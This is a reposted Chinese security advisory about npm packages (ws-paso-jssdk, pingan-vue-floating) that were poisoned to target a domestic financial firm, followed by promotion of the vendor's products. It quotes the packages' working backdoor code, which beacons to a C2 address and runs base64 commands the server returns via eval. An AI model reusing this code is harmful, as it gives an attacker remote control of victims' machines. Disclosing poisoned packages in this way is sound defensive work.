当前位置: 首页 > news >正文

常熟网站建设公司做游戏模板下载网站有哪些内容

常熟网站建设公司,做游戏模板下载网站有哪些内容,图书馆网站建设工作,中国网站域名备案管理系统简述 2023年8月9日,墨菲监控到用户名为 snugglejack_org (邮件地址:SnuggleBearrxxhotmail.com)的用户发布到 NPM 仓库中的 ws-paso-jssdk 组件包具有发向 https://ql.rustdesk[.]net 的可疑流量,经过确认该组件包携带远控脚本&a…

 简述

2023年8月9日,墨菲监控到用户名为 snugglejack_org (邮件地址:SnuggleBearrxx@hotmail.com)的用户发布到 NPM 仓库中的 ws-paso-jssdk 组件包具有发向 https://ql.rustdesk[.]net 的可疑流量,经过确认该组件包携带远控脚本,从攻击者可控的 C2 服务器接收并执行系统命令,该组件包于2023年8月10日7点 21 分从 NPM 仓库下架。

经过持续跟踪发现,该投毒者继续向 NPM 仓库继续发布了 pingan-vue-floating 等类似恶意组件包,投毒包的恶意 C2 地址改为了 62.234.32.226 ,此 IP 为以北京腾讯云提供,并且投毒包以 pingan、ynf 等命名,很大几率是针对国内厂商(例如中国*安),投毒者通过模拟目标企业内部私有源组件命名进行混淆,进而通过诱导用户企业内部用户下载投毒组件包实现对目标机器的远控入侵,这是目前公开发现的首起针对国内金融企业的开源组件投毒攻击事件。

截至2023年8月14日,投毒包仍可在NPM腾讯源进行下载(见图1),用户可通过 npm ls 判断是否下载了恶意组件,批量检测投毒检测可联系墨菲安全使用产品工具进行全网一键排查,最近正值大型攻防演练,建议大家认真排查。

图1: 腾讯云NPM组件下载地址 

投毒分析

以pingan-vue-floating-0.0.7组件为例,该组件包通过 pm2 创建守护线程,每隔 45 秒后向攻击者可控的恶意C2服务器发送请求维持心跳,进而接收并执行攻击者发送的系统命令:


//pingan-vue-floating-0.0.7/app.jsconst key = (37532).toString(36).toLowerCase()+(27).toString(36).toLowerCase().split('').map(function(S){return String.fromCharCode(S.charCodeAt()+(-39))}).join('')+(1166).toString(36).toLowerCase()+(function(){var v=Array.prototype.slice.call(arguments),A=v.shift();return v.reverse().map(function(N,Q){return String.fromCharCode(N-A-10-Q)}).join('')})(43,107,106,169,150,111,106)+(914).toString(36).toLowerCase()+(function(){var k=Array.prototype.slice.call(arguments),D=k.shift();return k.reverse().map(function(r,I){return String.fromCharCode(r-D-8-I)}).join('')})(36,167,112)
const url = "http://62.234.32.226:8888"
const filename = path.join(os.tmpdir(), 'node_logs.txt');
const headersCnf = {headers: {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134'}
};
……
function heartbeat(){const requestData = {hostname: os.hostname(),uuid:machineIdSync({original: true}),os:os.platform(),};sendRequest(url+'/api/index',aesEncrypt(JSON.stringify(requestData)))const task = {uuid:machineIdSync({original: true}),}sendRequest(url+'/api/captcha',aesEncrypt(JSON.stringify(task))).then(result => {try{if (result !== undefined) {const data = JSON.parse(result);const decodedData = Buffer.from(data.code, 'base64').toString();eval(decodedData)}}catch (error){}});}function app(){const result = checkFile();if (result.exists) {return} else {createTmpFile();setInterval(heartbeat, 45000);}
}
app()

此次事件的攻击者投毒的所有组件列表

Tip:请各单位自行排查!

排查工具及投毒情报

1. 墨菲安全提供产品可实时拦截针对开源组件的投毒

墨菲安全的私有源网关产品可对npm、pip、maven等中央仓库的投毒事件进行实时的检测和拦截,同时支持对高危漏洞实现基线管理,目前该产品已在蚂蚁、小米、中国电信、中国移动等数十家客户落地应用。

2. 墨菲安全提供实时的开源组件投毒情报预警可订阅

墨菲安全0day漏洞及投毒情报覆盖最新的0day、1day及投毒情报预警,所有情报经过严格的安全专家研判,保障企业获取的第一手的高质量漏洞及投毒情报,更有比CVE漏洞库多25+额外的详细分析字段,目前该产品已在蚂蚁、美团、中国电信等数十家客户落地应用。


申请演示&试用通道:

https://www.murphysec.com/enterprise

http://www.yayakq.cn/news/500759/

相关文章:

  • 看摄影作品的网站开网站做备案需要什么资料
  • 定制网站开发技术广东省住房和城乡建设厅网站首页
  • 广东网站建设制作价格西安门户网
  • 网站的表单展馆展示设计公司一般做什么设计
  • 电商网站建设收费中国建设报社网站
  • 做网站的时候宽高多多短视频下载赚钱
  • 表白网站怎样做有创意seo和sem
  • 复旦大学精品课程网站上海外贸学院
  • 知道内容怎样让别人做网站网站流量攻击
  • 友谊路街道网站建设销售网站免费模板
  • 我的网站被黑了网站源码在线下载
  • 收费用的网站怎么做公司网页是什么
  • 网站建设与 维护实训报告范文网站建设起来还需要花钱吗
  • 书画协会网站建设天津建设工程信息网网页版
  • 贷款网站建设公司简介模板200字左右
  • 站嗨建站wordpress font google
  • 南京网络建站公司四川省住房和城乡建设厅网站首页
  • php做的网站 订单系统中铁建设集团有限公司是国企还是央企
  • 做网站有哪些主题浙江省建设执业资格中心网站
  • 济南哪里有网站建设公司无障碍浏览网站怎么做
  • 建设银行扬中网站做跨境电商的人才网站
  • 沈阳网站推广的公司网站建设前端需要看什么书
  • 网站建设与维护教程镇江建设局网站
  • wordpress 做仿站湖南刚刚发生的大事件
  • 聊城做网站的公司策划如何 做网站跳转
  • 做企业网站市场分析北海住房和城乡建设局网站
  • 张家界网站定制学院网站建设及维护实施办法
  • 邢台seo排名优化网络速度
  • 做通路富集分析的网站做网站都是用ps吗
  • 首页优化排名从零开始做网站seo